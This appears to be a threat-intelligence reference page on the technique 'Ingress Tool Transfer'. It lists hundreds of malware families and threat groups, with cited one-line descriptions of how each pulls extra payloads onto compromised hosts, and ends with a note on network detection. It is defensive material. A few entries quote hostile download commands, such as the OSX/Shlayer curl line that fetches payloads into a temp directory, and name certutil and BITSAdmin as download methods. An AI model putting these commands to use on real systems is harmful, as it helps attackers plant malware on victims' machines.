T1105
Ingress Tool Transfer
内部へのツール転送

ABK has the ability to download files from C2.^[3]

Action RAT has the ability to download additional payloads onto an infected machine.^[4]

Agent Tesla can download additional files for execution on the victim’s machine.^[5][6]

Agent.btz attempts to download an encrypted binary from a specified domain.^[7]

Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.^[8]

Amadey can download and execute files to further infect a host machine with additional malware.^[9]

Anchor can download additional payloads.^[10][11]

Andariel has downloaded additional tools and malware onto compromised hosts.^[12]

APT-C-36 has downloaded binary data from a specified domain after the malicious document is opened.^[13]

APT18 can upload a file to the victim’s machine.^[14]

APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.^{[15][16][17][18][19]}

APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access.^[20]

APT3 has a tool that can copy files to remote machines.^[21]

APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.^[22]

APT33 has downloaded additional files and programs from its C2 server.^[23][24]

APT37 has downloaded second stage malware from compromised websites.^{[25][26][27][28]}

APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim’s machine.^[29]

APT39 has downloaded tools to compromised hosts.^[30][31]

APT41 used certutil to download additional files.^[32][33][34]

Aquatic Panda has downloaded additional malware onto compromised hosts.^[35]

Aria-body has the ability to download additional payloads from C2.^[36]

Astaroth uses certutil and BITSAdmin to download additional malware. ^[37][38][39]

Attor can download additional plugins, updates and other files. ^[40]

AuditCred can download files and additional malware.^[41]

Avenger has the ability to download files from C2 to a compromised host.^[3]

Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.^[42][43]

BabyShark has downloaded additional files from the C2.^[44][45]

BackConfig can download and execute additional payloads on a compromised host.^[46]

Backdoor.Oldrea can download additional modules from C2.^[47]

BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.^[48]

BADFLICK has download files from its C2 server.^[49]

BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.^[50][51][52]

BadPatch can download and execute or update malware.^[53]

Bandook can download files to the system.^[54]

Bankshot uploads files and secondary payloads to the victim's machine.^[55]

Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.^{[56][57][58][59]}

BBK has the ability to download files from C2 to the infected host.^[3]

BendyBear is designed to download an implant from a C2 server.^[60]

BISCUIT has a command to download a file from the C2 server.^[61]

Bisonal has the capability to download files to execute on the victim’s machine.^[62][63][64]

BITSAdmin can be used to create BITS Jobs to upload and/or download files.^[65]

BITTER has downloaded additional malware and tools onto a compromised host.^[66][67]

BlackMould has the ability to download files to the victim's machine.^[68]

BLINDINGCAN has downloaded files to a victim machine.^[69]

BLUELIGHT can download additional files onto the host.^[27]

Bonadan can download additional modules from the C2 server.^[70]

BONDUPDATER can download or upload files from its C2 server.^[71]

BoomBox has the ability to download next stage malware components to a compromised system.^[72]

BoxCaon can download files.^[73]

Briba downloads files onto infected hosts.^[74]

BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).^[75]

build_downer has the ability to download files from C2 to the infected host.^[3]

Bumblebee can download and execute additional payloads including through the use of a Dex command.^[76][77][78]

Bundlore can download and execute new versions of itself.^[79]

During C0010, UNC3890 actors downloaded tools and malware onto a compromised host.^[80]

During C0015, the threat actors downloaded additional tools and files onto a compromised network.^[81]

Calisto has the capability to upload and download files to the victim's machine.^[82]

CallMe has the capability to download a file to the victim from the C2 server.^[83]

Cannon can download a payload for execution.^[84]

Carberp can download and execute new plugins from the C2 server. ^[85][86]

Cardinal RAT can download and execute additional payloads.^[87]

CARROTBALL has the ability to download and install a remote payload.^[88]

CARROTBAT has the ability to download and execute a remote file via certutil.^[89]

Caterpillar WebShell has a module to download and upload files to the system.^[90]

certutil can be used to download files from a given URL.^[91][92]

Chaes can download additional files onto an infected machine.^[93]

CharmPower has the ability to download additional modules to a compromised host.^[94]

ChChes is capable of downloading files, including additional modules.^[95][96][97]

Chimera has remotely copied tools and malware onto targeted systems.^[98]

China Chopper's server component can download remote files.^{[99][100][101]}

CHOPSTICK is capable of performing remote file transmission.^[102]

Chrommme can download its code from C2.^[103]

CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.^[104]

cmd can be used to copy files to/from a remotely connected external system.^[105]

Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers.^[106][1] The group's JavaScript backdoor is also capable of downloading files.^[107]

Cobalt Strike can deliver additional payloads to victim machines.^[108][109]

CoinTicker executes a Python script to download its second stage.^[110]

Conficker downloads an HTTP server to the infected machine.^[111]

Confucius has downloaded additional files and payloads onto a compromised host following initial access.^[112][113]

CookieMiner can download additional scripts from a web server.^[114]

CORESHELL downloads another dropper from its C2 server.^[115]

CostaBricks has been used to load SombRAT onto a compromised host.^[116]

During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.^[116]

CreepyDrive can download files to the compromised host.^[117]

Crimson contains a command to retrieve files from its C2 server.^{[118][119][120]}

Cryptoistic has the ability to send and receive files.^[121]

CSPY Downloader can download additional tools to a compromised host.^[122]

Cuba can download files from its C2 server.^[123]

Cyclops Blink has the ability to download files to target systems.^[124][125]

Dacls can download its payload from a C2 server.^[121][126]

DanBot can download additional files to a targeted system.^[127]

DarkComet can load any files onto the infected machine to execute.^[128][129]

Darkhotel has used first-stage payloads that download additional malware from C2 servers.^[130]

Daserf can download remote files.^[131][75]

DDKONG downloads and uploads files on the victim’s machine.^[132]

DEATHRANSOM can download files to a compromised host.^[133]

Denis deploys additional backdoors and hacking tools to the system.^[134]

Diavol can receive configuration updates and additional payloads including wscpy.exe from C2.^[135]

Dipsind can download remote files.^[136]

DnsSystem can download files to compromised systems after receiving a command with the string downloaddd.^[137]

DOGCALL can download and execute additional payloads.^[138]

Doki has downloaded scripts from C2.^[139]

Donut can download and execute previously staged shellcode payloads.^[140]

down_new has the ability to download files to the compromised host.^[3]

After downloading its main config file, Downdelph downloads multiple payloads from C2 servers.^[141]

Dragonfly has copied and installed tools for operations once in the victim environment.^[142]

DRATzarus can deploy additional tools onto an infected machine.^[143]

DropBook can download and execute additional files.^[144][145]

Drovorub can download files to a compromised host.^[146]

Dtrack’s can download and upload a file to the victim’s computer.^[147][148]

Dyre has a command to download and executes additional files.^[149]

Ecipekac can download additional payloads to a compromised host.^[150]

Egregor has the ability to download files from its C2 server.^[151][152]

The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.^[153]

Elise can download additional files from the C2 server for execution.^[154]

Ember Bear has used tools to download malicious code.^[155]

Emissary has the capability to download files from the C2 server.^[156]

Empire can upload and download to and from a victim machine.^[157]

esentutl can be used to copy files from a given URL.^[158]

EvilBunny has downloaded additional Lua scripts from the C2.^[159]

EVILNUM can download and upload files to the victim's computer.^[160][161]

Evilnum can deploy additional components or tools as needed.^[160]

Exaramel for Linux has a command to download a file from and to a remote C2 server.^[162][163]

Explosive has a function to download a file to the infected system.^[164]

Felismus can download files from remote servers.^[165]

FELIXROOT downloads and uploads files to and from the victim’s machine.^[166][167]

FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.^[168][169]

FIN8 has used remote code execution to download subsequent payloads.^[170][171]

Flagpro can download additional malware from the C2 server.^[172]

FlawedAmmyy can transfer files from C2.^[173]

FoggyWeb can receive additional malicious components from an actor controlled C2 server and execute them on a compromised AD FS server.^[174]

Fox Kitten has downloaded additional tools including PsExec directly to endpoints.^[175]

During Frankenstein, the threat actors downloaded files and tools onto a victim machine.^[176]

ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment.^[177][178]

FunnyDream can download additional files onto a compromised host.^[179]

During FunnyDream, the threat actors downloaded additional droppers and backdoors onto a compromised system.^[179]

FYAnti can download additional payloads to a compromised host.^[150]

GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.^[180][68]

Gamaredon Group has downloaded additional malware and tools onto a compromised host.^{[181][182][183][184]}

Gazer can execute a task to download a file.^[185][186]

Gelsemium can download additional plug-ins to a compromised host.^[103]

gh0st RAT can download files to the victim’s machine.^[187][188]

Gold Dragon can download additional components from the C2 server.^[189]

GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.^[190]

GoldMax can download and execute additional files.^[191][192]

Gorgon Group malware can download additional files from C2 servers.^[193]

Grandoreiro can download its second stage from a hardcoded URL within the loader's code.^[194][195]

GreyEnergy can download additional modules and payloads.^[167]

GrimAgent has the ability to download and execute additional payloads.^[196]

GuLoader can download further malware for execution on the victim's machine.^[197]

H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.^[198]

HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.^[199]

Hancitor has the ability to download additional files from C2.^[200]

can download and execute a second-stage payload.^[25]

Helminth can download additional files.^[201]

HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.^[202]

Hi-Zor has the ability to upload and download files from its C2 server.^[203]

HiddenWasp downloads a tar compressed archive from a download server to the system.^[204]

Hikit has the ability to download files to a compromised host.^[205]

Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.^[206]

HOPLIGHT has the ability to connect to a remote host in order to upload and download files.^[207]

HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine.^[208]

HTTPBrowser is capable of writing a file to the compromised system from the C2 server.^[209]

Hydraq creates a backdoor through which remote attackers can download files and additional malware components.^[210][211]

HyperBro has the ability to download additional files.^[212]

IcedID has the ability to download additional modules and a configuration file from C2.^[213][214]

IndigoZebra has downloaded additional files and tools from its C2 server.^[73]

Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host.^[215][216]

Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory.^[217]

InvisiMole can upload files to the victim's machine for operations.^[218][219]

Ixeshe can download and execute additional files.^[220]

Javali can download payloads from remote C2 servers.^[39]

JHUHUGIT can retrieve an additional payload from its C2 server.^[221][222] JHUHUGIT has a command to download files to the victim’s machine.^[223]

JPIN can download files and upgrade itself.^[136]

jRAT can download and execute files.^{[224][225][226]}

JSS Loader has the ability to download malicious executables to a compromised host.^[227]

KARAE can upload and download files, including second-stage malware.^[25]

Kasidet has the ability to download and execute additional files.^[228]

Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.^[229]

Ke3chang has used tools to download files to compromised machines.^[230]

Kerrdown can download specific payloads to a compromised host based on OS architecture.^[231]

Kessel can download additional modules from the C2 server.^[70]

Kevin can download files to the compromised host.^[202]

KeyBoy has a download and upload functionality.^[232][233]

KEYMARBLE can upload files to the victim’s machine and can download additional payloads.^[234]

KGH_SPY has the ability to download and execute code from remote servers.^[122]

Kimsuky has downloaded additional scripts, tools, and malware onto victim systems.^[33][235]

Kinsing has downloaded additional lateral movement scripts from C2.^[236]

Kivars has the ability to download and execute files.^[237]

Koadic can download additional files and tools.^[238][239]

KOCTOPUS has executed a PowerShell command to download a file to the system.^[239]

KONNI can download files and execute them on the victim’s machine.^[240][241]

Kwampirs downloads additional files from C2 servers.^[242]

Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.^{[243][244][245][121][126][143][246][247][248][249][250][251][252]}

LazyScripter had downloaded additional tools to a compromised host.^[239]

Leviathan has downloaded additional scripts and files from adversary-controlled servers.^[253][99]

LightNeuron has the ability to download and execute additional files.^[254]

Linfo creates a backdoor through which remote attackers can download files onto compromised hosts.^[255]

LiteDuke has the ability to download files.^[256]

LitePower has the ability to download payloads containing system commands to a compromised host.^[257]

Lizar can download additional plugins, files, and tools.^[258]

Lokibot downloaded several staged items onto the victim's machine.^[259]

LoudMiner used SCP to update the miner from the C2.^[260]

LOWBALL uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.^[261]

Lucifer can download and execute a replica of itself using certutil.^[262]

Machete can download additional files for execution on the victim’s machine.^[263]

MacMa has downloaded additional files, including an exploit for used privilege escalation.^[264][265]

macOS.OSAMiner has used curl to download a Stripped Payloads from a public facing adversary-controlled webpage.

Magic Hound has downloaded additional code and files from servers onto victims.^[266][267]

MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin.^[268]

MCMD can upload additional files to a compromised host.^[269]

MechaFlounder has the ability to upload and download files to and from a compromised host.^[270]

Melcoz has the ability to download additional files to a compromised host.^[39]

menuPass has installed updates and new malware on victims.^[271][272]

Metamorfo has used MSI files to download additional files to execute.^{[273][274][275][276]}

Meteor has the ability to download additional files for execution on the victim's machine.^[277]

Micropsia can download and execute an executable from the C2 server.^[278][279]

Milan has received files from C2 and stored them in log folders beginning with the character sequence a9850d2f.^[280]

MiniDuke can download additional encrypted backdoors onto the victim via GIF files.^[281][256]

Mis-Type has downloaded additional malware and files onto a compromised host.^[282]

Misdat is capable of downloading files from the C2.^[282]

Mivast has the capability to download and execute .exe files.^[283]

MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.^[83]

MoleNet can download additional payloads from the C2.^[144]

Molerats used executables to download malicious files from different sources.^[284][285]

Mongall can download files to targeted systems.^[286]

More_eggs can download and launch additional payloads.^[287][288]

Moses Staff has downloaded and installed web shells to following path C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx.^[289]

Mosquito can upload and download files to the victim.^[290]

MuddyWater has used malware that can upload additional files to the victim’s machine.^{[291][292][293][294]}

Mustang Panda has downloaded additional executables following the initial infection stage.^[295]

NanHaiShu can download additional files from URLs.^[253]

NanoCore has the capability to download and activate additional modules for execution.^[296][297]

NavRAT can download files remotely.^[298]

NDiskMonitor can download and execute a file from given URL.^[52]

Nebulae can download files from C2.^[299]

Neoichor can download additional files onto a compromised host.^[230]

Nerex creates a backdoor through which remote attackers can download files onto a compromised host.^[153]

Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.^[300]

NETWIRE can downloaded payloads from C2 to the compromised host.^[301][302]

Nidiran can download and execute files.^[303]

During Night Dragon, threat actors used administrative utilities to deliver Trojan components to remote systems.^[304]

njRAT can download files to the victim’s machine.^[305][306]

NOKKI has downloaded a remote module for execution.^[307]

Nomadic Octopus has used malicious macros to download additional files to the victim's machine.^[308]

Octopus can download additional files and tools onto the victim’s machine.^{[309][310][308]}

OilRig can download remote files onto victims.^[311]

Okrum has built-in commands for uploading, downloading, and executing files to the system.^[312]

OopsIE can download files from its C2 server to the victim's machine.^[313][314]

During Operation Honeybee, the threat actors downloaded additional malware and malicious scripts onto a compromised host.^[315]

During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader.^[316]

During Operation Wocao, threat actors downloaded additional files to the infected system.^[317]

Orz can download files onto the victim.^[253]

OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.^{[318][319][320][321]}

OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine.^[322][323]

OutSteel can download files from its C2 server.^[155]

P.A.S. Webshell can upload and download files to and from compromised hosts.^[163]

P8RAT can download additional payloads to a target system.^[150]

Pandora can load additional drivers and files onto a victim machine.^[324]

Pasam creates a backdoor through which remote attackers can upload files.^[325]

Patchwork payloads download additional files from the C2 server.^[326][52]

Penquin can execute the command code do_download to retrieve remote files from C2.^[327]

Peppy can download and execute remote files.^[118]

PipeMon can install additional modules via C2 commands.^[328]

Pisloader has a command to upload a file to the victim machine.^[329]

PLAINTEE has downloaded and executed additional plugins.^[132]

PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel.^[330]

PLEAD has the ability to upload and download files to and from an infected host.^[331]

PlugX has a module to download and execute files on the compromised machine.^[332][333]

PoetRAT has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.^[334][335]

PoisonIvy creates a backdoor through which remote attackers can upload files.^[336]

PolyglotDuke can retrieve payloads from the C2 server.^[256]

Pony can download additional files onto the infected system.^[337]

POSHSPY downloads and executes additional PowerShell code and Windows binaries.^[338]

PowerDuke has a command to download a file.^[339]

PowerLess can download additional payloads to a compromised host.^[340]

PowerPunch can download payloads from adversary infrastructure.^[184]

POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.^[341]

POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.^[342]

POWRUNER can download or upload files from its C2 server.^[311]

CostaBricks can download additional payloads onto a compromised host.^[116]

Psylo has a command to download a file to the system from its C2 server.^[83]

Pteranodon can download and execute additional files.^{[181][343][344]}

PUNCHBUGGY can download additional files and payloads to compromised hosts.^[345][346]

Pupy can upload and download to/from a victim machine.^[347]

QakBot has the ability to download additional components and malware.^{[348][349][350][351][352][353]}

QuasarRAT can download files to the victim’s machine and execute them.^[354][355]

QuietSieve can download and execute payloads on a target host.^[184]

RainyDay can download files to a compromised host.^[299]

Rancor has downloaded additional malware, including by using certutil.^[132]

RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.^[356]

RATANKBA uploads and downloads information.^[357][358]

RCSession has the ability to drop additional files to an infected machine.^[359]

RDAT can download files via DNS.^[360]

RedLeaves is capable of downloading a file from a specified URL.^[361]

RegDuke can download files from C2.^[256]

Remcos can upload and download files to and from the victim’s machine.^[362]

RemoteCMD copies a file over to the remote system before execution.^[363]

RemoteUtilities can upload and download files to and from a target machine.^[294]

Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.^[364][365]

Revenge RAT has the ability to upload and download files.^[366]

REvil can download a copy of itself from an attacker controlled IP address to the victim machine.^{[367][368][369]}

RGDoor uploads and downloads files to and from the victim’s machine.^[370]

Rocke used malware to download additional malicious files to the target system.^[371]

RogueRobin can save a new file to the system from the C2 server.^[372][373]

ROKRAT can retrieve additional malicious payloads from its C2 server.^{[374][375][28][376]}

RTM can download additional files.^[377][378]

S-Type can download additional files onto a compromised host.^[282]

Saint Bot can download additional files onto a compromised host.^[155]

Sakula has the capability to download files.^[379]

Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.^[380][381]

SDBbot has the ability to download a DLL from C2 to a compromised host.^[382]

SeaDuke is capable of uploading and downloading files.^[383]

Seasalt has a command to download additional files.^[61][61]

SEASHARPEE can download remote files onto victims.^[384]

ServHelper may download additional files to execute.^[385][386]

Seth-Locker has the ability to download and execute files on a compromised host.^[387]

ShadowPad has downloaded code from a C2 server.^[388]

Shamoon can download an executable to run on the victim.^[389]

Shark can download additional files from its C2 via HTTP or DNS.^[280][390]

SharpStage has the ability to download and execute additional payloads via a DropBox API.^[144][145]

SHARPSTATS has the ability to upload and download files.^[391]

ShimRat can download additional files.^[392]

ShimRatReporter had the ability to download additional payloads.^[392]

SHUTTERSPEED can download and execute an arbitary executable.^[25]

Sibot can download and execute a payload onto a compromised system.^[191]

SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.^[4]

SideTwist has the ability to download additional files.^[393]

Sidewinder has used LNK files to download remote files to the victim's network.^[394][395]

Silence has downloaded additional modules and malware to victim’s machines.^[396]

SILENTTRINITY can load additional files and tools, including Mimikatz.^[397]

Skidmap has the ability to download files on an infected host.^[398]

Sliver can upload files from the C2 server to the victim machine using the upload command.^[399]

SLOTHFULMEDIA has downloaded files onto a victim machine.^[400]

SLOWDRIFT downloads additional payloads.^[25]

Small Sieve has the ability to download files.^[401]

Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.^[402]

SMOKEDHAM has used Powershell to download UltraVNC and Ngrok from third-party file sharing sites.^[403]

SodaMaster has the ability to download additional payloads from C2 to the targeted system.^[150]

SombRAT has the ability to download and execute additional payloads.^{[116][133][404]}

SoreFang can download additional payloads from C2.^[405][406]

SpeakUp downloads and executes additional files from a remote server. ^[407]

SpicyOmelette can download malicious files from threat actor controlled AWS URL's.^[408]

SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.^[409]

Squirrelwaffle has downloaded and executed additional encoded payloads.^[410][411]

StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.^[412]

StrifeWater can download updates and auxiliary modules.^[413]

StrongPity can download files to specified targets.^[414]

SUNBURST delivered different payloads, including TEARDROP in at least one instance.^[20]

SysUpdate has the ability to download files to a compromised host.^[324]

TA505 has downloaded additional malware to execute on victim systems.^{[415][386][416]}

TA551 has retrieved DLLs and installer binaries for malware execution from C2.^[417]

Taidoor has downloaded additional files onto a compromised host.^[418]

TAINTEDSCRIBE can download additional modules from its C2 server.^[419]

TDTESS has a command to download and execute an additional file.^[420]

TeamTNT has the curl and wget commands as well as batch scripts to download new tools.^[421][422]

ThiefQuest can download and execute payloads in-memory or from disk.^[423]

Threat Group-3390 has downloaded additional malware and tools, including through the use of certutil, onto a compromised host .^[209][424]

ThreatNeedle can download additional tools to enable lateral movement.^[246]

TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware.^[425]

Tomiris can download files and execute them on a victim's system.^[426]

Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.^[427]

TrickBot downloads several additional files and saves them to the victim's machine.^[428][429]

Trojan.Karagany can upload, download, and execute files on the victim.^[430][431]

Tropic Trooper has used a delivered trojan to download additional files.^[432]

TSCookie has the ability to upload and download files to and from the infected host.^[433]

Turian can download additional files and tools from its C2.^[48]

Turla has used shellcode to download Meterpreter after compromising a victim.^[434]

TURNEDUP is capable of downloading additional files.^[435]

TYPEFRAME can upload and download files to the victim’s machine.^[436]

UBoatRAT can upload and download files to the victim’s machine.^[437]

Unknown Logger is capable of downloading remote files.^[50]

UPPERCUT can download and upload files to and from the victim’s machine.^[438]

Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.^[439][440]

Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.^[441][442]

VaporRage has the ability to download malicious shellcode to compromised systems.^[72]

Vasport can download files.^[443]

VBShower has the ability to download VBS files to the target computer.^[444]

VERMIN can download and upload files to the victim's machine.^[445]

Volatile Cedar can deploy additional tools.^[90]

Volgmer can download remote files and additional payloads to the victim's machine.^{[446][447][448]}

WarzoneRAT can download and execute additional files.^[449]

Waterbear can receive and load executables from remote C2 servers.^[450]

WEBC2 can download and execute a file.^[451]

WellMail can receive data and executable scripts from C2.^[452]

WellMess can write files to a compromised host.^[453][454]

WhisperGate can download additional stages of malware from a Discord CDN channel.^{[455][456][457][458]}

Whitefly has the ability to download additional tools from the C2.^[459]

Wiarp creates a backdoor through which remote attackers can download files.^[460]

Windshift has used tools to deploy additional payloads to compromised hosts.^[461]

Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. ^[462]

The Winnti for Windows dropper can place malicious payloads on targeted systems.^[463]

Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.^[464]

WIRTE has downloaded PowerShell code from the C2 server to be executed.^[465]

Xbash can download additional malicious files from its C2 server.^[466]

xCaon has a command to download files to the victim's machine.^[73]

XCSSET downloads browser specific AppleScript modules using a constructed URL with the curl command, https://" & domain & "/agent/scripts/" & moduleName & ".applescript.^[467]

YAHOYAH uses HTTP GET requests to download other files that are executed in memory.^[468]

Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.^{[469][84][470][17]}

ZeroT can download additional payloads onto the victim.^[471]

Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.^[472]

ZIRCONIUM has used tools to download malicious files to compromised hosts.^[473]

ZLib has the ability to download files.^[282]

Zox can download files to a compromised machine.^[205]

ZxShell has a command to transfer files from a remote host.^[474]

ZxxZ can download and execute additional files.^[66]

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.^[475]